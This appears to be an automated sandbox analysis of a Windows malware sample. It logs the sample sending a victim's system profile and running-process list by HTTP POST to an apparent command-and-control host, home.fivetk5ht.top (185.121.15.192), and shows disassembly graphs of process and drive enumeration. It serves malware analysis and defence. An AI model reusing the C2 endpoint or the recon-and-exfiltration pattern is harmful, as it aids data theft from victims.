                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710761", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.10 | 49705 | 185.121.15.192 | 80 | 7280 | C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 20, 2024 17:06:05.018310070 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 443893
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710761", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.10 | 49706 | 185.121.15.192 | 80 | 7280 | C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 20, 2024 17:06:06.839975119 CET | 12360 | OUT | POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 443893
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710761", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.10 | 49708 | 185.121.15.192 | 80 | 7280 | C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 20, 2024 17:06:08.600967884 CET | 87 | OUT | GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                  Host: home.fivetk5ht.top
                                  Accept: */*
                                  Dec 20, 2024 17:06:09.874078989 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                  Cache-Control: no-cache
                                  Connection: close
                                  Content-Type: text/html
                                  Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.10 | 49703 | 98.85.100.80 | 443 | 7280 | C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-12-20 16:06:01 UTC | 52 | OUT | GET /ip HTTP/1.1
                                  Host: httpbin.org
                                  Accept: */*
                                  2024-12-20 16:06:01 UTC | 224 | IN | HTTP/1.1 200 OK
                                  Date: Fri, 20 Dec 2024 16:06:01 GMT
                                  Content-Type: application/json
                                  Content-Length: 31
                                  Connection: close
                                  Server: gunicorn/19.9.0
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Credentials: true
                                  2024-12-20 16:06:01 UTC | 31 | IN | Data Ascii: { "origin": "8.46.123.189"}



                                  Target ID:0
                                  Start time:11:05:55
                                  Start date:20/12/2024
                                  Path:C:\Users\user\Desktop\iuO4kwUi17.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\iuO4kwUi17.exe"
                                  Imagebase:0x7d0000
                                  File size:4'480'000 bytes
                                  MD5 hash:A7E8135CFE118AA459FE0483617FD64E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:5
                                  Start time:11:06:09
                                  Start date:20/12/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 1152
                                  Imagebase:0xed0000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:0.3%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:66
                                    Total number of Limit Nodes:2
                                    execution_graph 11480 75e0259 11481 75e025c 11480->11481 11486 75e02d8 11481->11486 11483 75e02c8 Process32FirstW 11485 75e03ec 11483->11485 11487 75e02eb Process32FirstW 11486->11487 11489 75e03ec 11487->11489 11500 75a024d 11501 75a0251 11500->11501 11506 75a0267 11501->11506 11507 75a0275 GetLogicalDrives 11506->11507 11509 75a03e6 11507->11509 11764 75f0047 11765 75f0031 11764->11765 11767 75f0094 11765->11767 11768 75f0096 11765->11768 11769 75f00bd Process32NextW 11768->11769 11771 75f04bd 11769->11771 11518 75a0273 11519 75a0275 GetLogicalDrives 11518->11519 11521 75a03e6 11519->11521 11522 75e026f 11523 75e020f 11522->11523 11523->11522 11524 75e02d8 Process32FirstW 11523->11524 11525 75e02c8 Process32FirstW 11524->11525 11527 75e03ec 11525->11527 11392 75a0411 11393 75a0372 11392->11393 11394 75a03e6 11392->11394 11393->11394 11395 75a03b6 GetLogicalDrives 11393->11395 11395->11394 11814 75a0000 11815 75a001e 11814->11815 11816 75a0267 GetLogicalDrives 11815->11816 11817 75a0258 GetLogicalDrives 11816->11817 11819 75a03e6 11817->11819 11820 75e0000 11821 75e001a 11820->11821 11822 75e02d8 Process32FirstW 11821->11822 11823 75e02c8 Process32FirstW 11822->11823 11825 75e03ec 11823->11825 11826 75f0000 11831 75f0017 11826->11831 11834 75f0018 11831->11834 11832 75f0096 Process32NextW 11832->11834 11833 75f0094 11834->11832 11834->11833 11845 75f0029 11846 75f0031 11845->11846 11847 75f0096 Process32NextW 11846->11847 11848 75f0094 11846->11848 11847->11846 11460 75a03d3 11461 75a0372 GetLogicalDrives 11460->11461 11463 75a03e6 11460->11463 11461->11463 11572 75e02fc 11573 75e0300 Process32FirstW 11572->11573 11575 75e03ec 11573->11575 11877 75f00e4 11878 75f00f2 Process32NextW 11877->11878 11880 75f04bd 11878->11880 11387 75a039e GetLogicalDrives 11388 75a03e6 11387->11388 11905 75f00b5 11907 75f0018 11905->11907 11909 75f00b8 Process32NextW 11905->11909 11906 75f0096 Process32NextW 11906->11907 11907->11906 11908 75f0094 
11907->11908 11911 75f04bd 11909->11911

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 75e0069-75e02e7 call 75e02d8 27 75e02c8-75e02e7 0->27 28 75e02e9-75e03a5 0->28 27->27 27->28 38 75e03b6-75e03dc Process32FirstW 28->38 40 75e03ec-75e0457 38->40 45 75e046c-75e04cf call 75e04d7 40->45 52 75e046a-75e046b 45->52 53 75e04d1-75e04d5 45->53 52->45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID: ?
                                    • API String ID: 2623510744-1684325040
                                    • Opcode ID: c8ae15b34f754719913a63abdcb118e846e5e3c409382cdf5b94e7db5ea58c49
                                    • Instruction ID: 4d999c6aafea241a19e89d5c634999359c79062d2afa42239af701f8e88df910
                                    • Opcode Fuzzy Hash: c8ae15b34f754719913a63abdcb118e846e5e3c409382cdf5b94e7db5ea58c49
                                    • Instruction Fuzzy Hash: 8E5127FB56C220BEA20A85955F50AFA676EF6D7330F30882AF40FC75C2E3E54A095171

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 558bce3486833d65449634d78ca2067ca31973757a938c54091272fcdbd0c750
                                    • Instruction ID: 9bead730af937c942b12befed85fc0dc9df47c26f7ffccf987050a95011d1da1
                                    • Opcode Fuzzy Hash: 558bce3486833d65449634d78ca2067ca31973757a938c54091272fcdbd0c750
                                    • Instruction Fuzzy Hash: 2F4157E797C224BEA64285A14B949FE6B6EF9D3230F304C37F40BC65C2F2954A064271

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 130 75a0234-75a03ab call 75a0267 150 75a03b6-75a03cd GetLogicalDrives 130->150 151 75a03e6-75a0443 150->151 155 75a0450-75a046f call 75a0475 151->155 158 75a0471-75a0473 155->158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: daa53bcde5815f21065cad6206ad5d2bf8d8e8b5dad83e3edaf66ff8204e177c
                                    • Instruction ID: 758298e50222deefd86178e2d6fe9046c8ad08447b640c1b959a75762d20dec3
                                    • Opcode Fuzzy Hash: daa53bcde5815f21065cad6206ad5d2bf8d8e8b5dad83e3edaf66ff8204e177c
                                    • Instruction Fuzzy Hash: 163133E797C215BE6242859157505FE6B6DFAD7630B308D37F40BC5682F2A50A094131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 99 75a0220-75a03ab call 75a0267 121 75a03b6-75a03cd GetLogicalDrives 99->121 122 75a03e6-75a0443 121->122 126 75a0450-75a046f call 75a0475 122->126 129 75a0471-75a0473 126->129
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 20f6342b50a115de6ee4151a0e9a5fe559af57c3db49a475e594f0b1fad8c862
                                    • Instruction ID: 77d82df42a4589cf076576e68fa8fef48212d02d011935a6807d6d2b4ef7ef03
                                    • Opcode Fuzzy Hash: 20f6342b50a115de6ee4151a0e9a5fe559af57c3db49a475e594f0b1fad8c862
                                    • Instruction Fuzzy Hash: 3B3122E797C215BE624181955754AFE6B6DF9D7230F308C37F40FC5A82F2D50A095132

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 159 75a02d5-75a03ab 171 75a03b6-75a03cd GetLogicalDrives 159->171 172 75a03e6-75a0443 171->172 176 75a0450-75a046f call 75a0475 172->176 179 75a0471-75a0473 176->179
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b494d201928a237972543737482677f0e850bce7c6af646e182f83bbc0d55968
                                    • Instruction ID: 2d3c774a79ec85c214043588055d307246e31e0b751c702c34fb974acd898b19
                                    • Opcode Fuzzy Hash: b494d201928a237972543737482677f0e850bce7c6af646e182f83bbc0d55968
                                    • Instruction Fuzzy Hash: 573149E797C224BEA24285A55B905FF2F6DF9D3630B308D37F44BC6586F2A50A065131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 180 75a0229-75a03ab call 75a0267 201 75a03b6-75a03cd GetLogicalDrives 180->201 202 75a03e6-75a0443 201->202 206 75a0450-75a046f call 75a0475 202->206 209 75a0471-75a0473 206->209
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b1b5ed1152e04d17716f22ad22513fa646126663e450f1a8ffa19f24a9387149
                                    • Instruction ID: 247bfaa1323b8095fe8f283737c60b6524924c4d946105fddcb6cc25815978e2
                                    • Opcode Fuzzy Hash: b1b5ed1152e04d17716f22ad22513fa646126663e450f1a8ffa19f24a9387149
                                    • Instruction Fuzzy Hash: 1A3120E797C225BE6242819557449FE6B6DFAD7230F308D37B40BC5682F2A50A095132

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 210 75a024d-75a03ab call 75a0267 230 75a03b6-75a03cd GetLogicalDrives 210->230 231 75a03e6-75a0443 230->231 235 75a0450-75a046f call 75a0475 231->235 238 75a0471-75a0473 235->238
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675

                                    Control-flow Graph

                                    control_flow_graph 239 75a027e-75a0286 240 75a0288-75a028b 239->240 241 75a028d-75a0294 239->241 242 75a0296-75a03ab 240->242 241->242 256 75a03b6-75a03cd GetLogicalDrives 242->256 257 75a03e6-75a0443 256->257 261 75a0450-75a046f call 75a0475 257->261 264 75a0471-75a0473 261->264
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675

                                    Control-flow Graph

                                    control_flow_graph 265 75a0267-75a03ab 282 75a03b6-75a03cd GetLogicalDrives 265->282 283 75a03e6-75a0443 282->283 287 75a0450-75a046f call 75a0475 283->287 290 75a0471-75a0473 287->290
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675

                                    Control-flow Graph

                                    control_flow_graph 291 75a0273-75a03ab 308 75a03b6-75a03cd GetLogicalDrives 291->308 309 75a03e6-75a0443 308->309 313 75a0450-75a046f call 75a0475 309->313 316 75a0471-75a0473 313->316
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675

                                    Control-flow Graph

                                    control_flow_graph 317 75a02a2-75a03ab 333 75a03b6-75a03cd GetLogicalDrives 317->333 334 75a03e6-75a0443 333->334 338 75a0450-75a046f call 75a0475 334->338 341 75a0471-75a0473 338->341
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675

                                    Control-flow Graph

                                    control_flow_graph 342 75a0290-75a03ab 357 75a03b6-75a03cd GetLogicalDrives 342->357 358 75a03e6-75a0443 357->358 362 75a0450-75a046f call 75a0475 358->362 365 75a0471-75a0473 362->365
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675

                                    Control-flow Graph

                                    control_flow_graph 366 75f00b5-75f00b6 367 75f00b8-75f0495 366->367 368 75f0076-75f0077 366->368 422 75f04a0-75f04a7 Process32NextW 367->422 370 75f0079 368->370 371 75f0083-75f0092 call 75f0096 368->371 372 75f007b-75f007f 370->372 373 75f0018-75f0024 370->373 380 75f0094 371->380 381 75f0031-75f003c 371->381 372->371 376 75f003d-75f007f 373->376 376->371 381->376 423 75f04bd-75f05bc call 75f05be 422->423
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0

                                    Control-flow Graph

                                    control_flow_graph 439 75f0096-75f0495 483 75f04a0-75f04a7 Process32NextW 439->483 484 75f04bd-75f05bc call 75f05be 483->484
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0

                                    Control-flow Graph

                                    control_flow_graph 500 75f00f8-75f0107 501 75f0109 500->501 502 75f00e8-75f00f3 500->502 504 75f010b-75f0495 501->504 502->504 544 75f04a0-75f04a7 Process32NextW 504->544 545 75f04bd-75f05bc call 75f05be 544->545
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 8b436dd42b6a20e983d0b4f02b452ae33bb1e6b2c9181f634b5d31fde45257d9
                                    • Instruction ID: bd59a54ac364d10032b25def82ed380d477da273e056aad3634b10d20e1f3a93
